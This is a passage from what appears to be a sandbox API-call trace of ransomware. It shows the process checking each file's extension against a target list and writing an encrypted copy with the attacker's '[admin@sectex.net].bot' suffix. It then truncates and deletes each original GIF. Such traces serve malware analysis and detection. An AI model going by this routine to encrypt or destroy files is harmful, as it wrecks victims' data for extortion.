	[0055.121] lstrlenW (lpString=".ppt") returned 4
	[0055.217] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString=".zip") returned 4
	[0055.217] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.217] lstrlenW (lpString=".rar") returned 4
	[0055.217] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.217] lstrlenW (lpString=".bz2") returned 4
	[0055.217] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.217] lstrlenW (lpString=".7z") returned 3
	[0055.217] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString=".dbf") returned 4
	[0055.217] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString=".1cd") returned 4
	[0055.217] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString=".jpg") returned 4
	[0055.217] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.217] lstrlenW (lpString=".doc") returned 4
	[0055.217] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.217] lstrlenW (lpString=".docx") returned 5
	[0055.217] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.217] lstrlenW (lpString=".pdf") returned 4
	[0055.218] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.218] lstrlenW (lpString=".xls") returned 4
	[0055.218] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.218] lstrlenW (lpString=".xlsx") returned 5
	[0055.218] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.218] lstrlenW (lpString=".ppt") returned 4
	[0055.218] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.218] lstrlenW (lpString=".zip") returned 4
	[0055.218] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.218] lstrlenW (lpString=".rar") returned 4
	[0055.218] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.218] lstrlenW (lpString=".bz2") returned 4
	[0055.218] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.218] lstrlenW (lpString=".7z") returned 3
	[0055.218] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.218] lstrlenW (lpString=".dbf") returned 4
	[0055.218] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.218] lstrlenW (lpString=".1cd") returned 4
	[0055.218] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.218] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00135_.GIF") returned 63
	[0055.218] lstrlenW (lpString=".jpg") returned 4
	[0055.218] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.218] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.218] lstrlenW (lpString="AG00154_.GIF") returned 12
	[0055.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0055.330] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5315) returned 1
	[0055.330] CloseHandle (hObject=0x20c) returned 1
	[0055.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 0x20
	[0055.330] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.330] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0055.330] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.330] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.331] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210
	[0055.331] GetLastError () returned 0x0
	[0055.331] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x14c3, lpOverlapped=0x0) returned 1
	[0055.475] WriteFile (in: hFile=0x210, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x14d0, lpOverlapped=0x0) returned 1
	[0055.476] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.476] WriteFile (in: hFile=0x210, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.476] SetEndOfFile (hFile=0x210) returned 1
	[0055.476] CloseHandle (hObject=0x210) returned 1
	[0055.476] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.476] SetEndOfFile (hFile=0x20c) returned 1
	[0055.477] CloseHandle (hObject=0x20c) returned 1
	[0055.477] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.477] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00154_.gif")) returned 1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString=".doc") returned 4
	[0055.478] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.478] lstrlenW (lpString=".docx") returned 5
	[0055.478] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.478] lstrlenW (lpString=".pdf") returned 4
	[0055.478] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString=".xls") returned 4
	[0055.478] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString=".xlsx") returned 5
	[0055.478] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.478] lstrlenW (lpString=".ppt") returned 4
	[0055.478] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString=".zip") returned 4
	[0055.478] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString=".rar") returned 4
	[0055.478] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString=".bz2") returned 4
	[0055.478] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.478] lstrlenW (lpString=".7z") returned 3
	[0055.478] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString=".dbf") returned 4
	[0055.478] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString=".1cd") returned 4
	[0055.478] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString=".jpg") returned 4
	[0055.478] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.479] lstrlenW (lpString=".doc") returned 4
	[0055.479] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.479] lstrlenW (lpString=".docx") returned 5
	[0055.479] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.479] lstrlenW (lpString=".pdf") returned 4
	[0055.479] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.479] lstrlenW (lpString=".xls") returned 4
	[0055.479] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.479] lstrlenW (lpString=".xlsx") returned 5
	[0055.479] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.479] lstrlenW (lpString=".ppt") returned 4
	[0055.479] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.479] lstrlenW (lpString=".zip") returned 4
	[0055.479] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.479] lstrlenW (lpString=".rar") returned 4
	[0055.479] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.479] lstrlenW (lpString=".bz2") returned 4
	[0055.479] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.479] lstrlenW (lpString=".7z") returned 3
	[0055.479] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.479] lstrlenW (lpString=".dbf") returned 4
	[0055.479] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.479] lstrlenW (lpString=".1cd") returned 4
	[0055.479] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00154_.GIF") returned 63
	[0055.479] lstrlenW (lpString=".jpg") returned 4
	[0055.479] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.480] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.480] lstrlenW (lpString="AG00158_.GIF") returned 12
	[0055.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0055.480] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=5030) returned 1
	[0055.480] CloseHandle (hObject=0x20c) returned 1
	[0055.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 0x20
	[0055.480] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c
	[0055.480] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.480] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210
	[0055.481] GetLastError () returned 0x0
	[0055.481] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x13a6, lpOverlapped=0x0) returned 1
	[0055.506] WriteFile (in: hFile=0x210, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x13b0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x13b0, lpOverlapped=0x0) returned 1
	[0055.509] ReadFile (in: hFile=0x20c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.509] WriteFile (in: hFile=0x210, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.509] SetEndOfFile (hFile=0x210) returned 1
	[0055.509] CloseHandle (hObject=0x210) returned 1
	[0055.509] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.509] SetEndOfFile (hFile=0x20c) returned 1
	[0055.510] CloseHandle (hObject=0x20c) returned 1
	[0055.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.510] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00158_.gif")) returned 1
	[0055.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.511] lstrlenW (lpString=".doc") returned 4
	[0055.511] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.511] lstrlenW (lpString=".docx") returned 5
	[0055.511] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.511] lstrlenW (lpString=".pdf") returned 4
	[0055.511] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.511] lstrlenW (lpString=".xls") returned 4
	[0055.511] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.511] lstrlenW (lpString=".xlsx") returned 5
	[0055.511] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.511] lstrlenW (lpString=".ppt") returned 4
	[0055.511] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.511] lstrlenW (lpString=".zip") returned 4
	[0055.511] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.511] lstrlenW (lpString=".rar") returned 4
	[0055.511] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.511] lstrlenW (lpString=".bz2") returned 4
	[0055.511] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.511] lstrlenW (lpString=".7z") returned 3
	[0055.511] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.511] lstrlenW (lpString=".dbf") returned 4
	[0055.512] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".1cd") returned 4
	[0055.512] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".jpg") returned 4
	[0055.512] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".doc") returned 4
	[0055.512] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.512] lstrlenW (lpString=".docx") returned 5
	[0055.512] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.512] lstrlenW (lpString=".pdf") returned 4
	[0055.512] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString=".xls") returned 4
	[0055.512] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString=".xlsx") returned 5
	[0055.512] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.512] lstrlenW (lpString=".ppt") returned 4
	[0055.512] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".zip") returned 4
	[0055.512] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString=".rar") returned 4
	[0055.512] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.512] lstrlenW (lpString=".bz2") returned 4
	[0055.512] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.512] lstrlenW (lpString=".7z") returned 3
	[0055.512] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".dbf") returned 4
	[0055.512] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.512] lstrlenW (lpString=".1cd") returned 4
	[0055.513] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00158_.GIF") returned 63
	[0055.513] lstrlenW (lpString=".jpg") returned 4
	[0055.513] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.513] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.513] lstrlenW (lpString="AG00163_.GIF") returned 12
	[0055.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.668] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=6984) returned 1
	[0056.668] CloseHandle (hObject=0x21c) returned 1
	[0056.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 0x20
	[0056.668] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.668] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.668] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0056.668] GetLastError () returned 0x0
	[0056.669] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x1b48, lpOverlapped=0x0) returned 1
	[0056.672] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x1b50, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x1b50, lpOverlapped=0x0) returned 1
	[0056.673] ReadFile (in: hFile=0x21c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.673] WriteFile (in: hFile=0x23c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.673] SetEndOfFile (hFile=0x23c) returned 1
	[0056.673] CloseHandle (hObject=0x23c) returned 1
	[0056.673] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.673] SetEndOfFile (hFile=0x21c) returned 1
	[0056.674] CloseHandle (hObject=0x21c) returned 1
	[0056.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00163_.gif")) returned 1
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.675] lstrlenW (lpString=".doc") returned 4
	[0056.675] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.675] lstrlenW (lpString=".docx") returned 5
	[0056.675] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.675] lstrlenW (lpString=".pdf") returned 4
	[0056.675] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.675] lstrlenW (lpString=".xls") returned 4
	[0056.675] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.675] lstrlenW (lpString=".xlsx") returned 5
	[0056.675] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.675] lstrlenW (lpString=".ppt") returned 4
	[0056.675] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.675] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00163_.GIF") returned 63
	[0056.675] lstrlenW (lpString=".zip") returned 4
	[0056.675] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.675] lstrlenW (lpString=".rar") returned 4
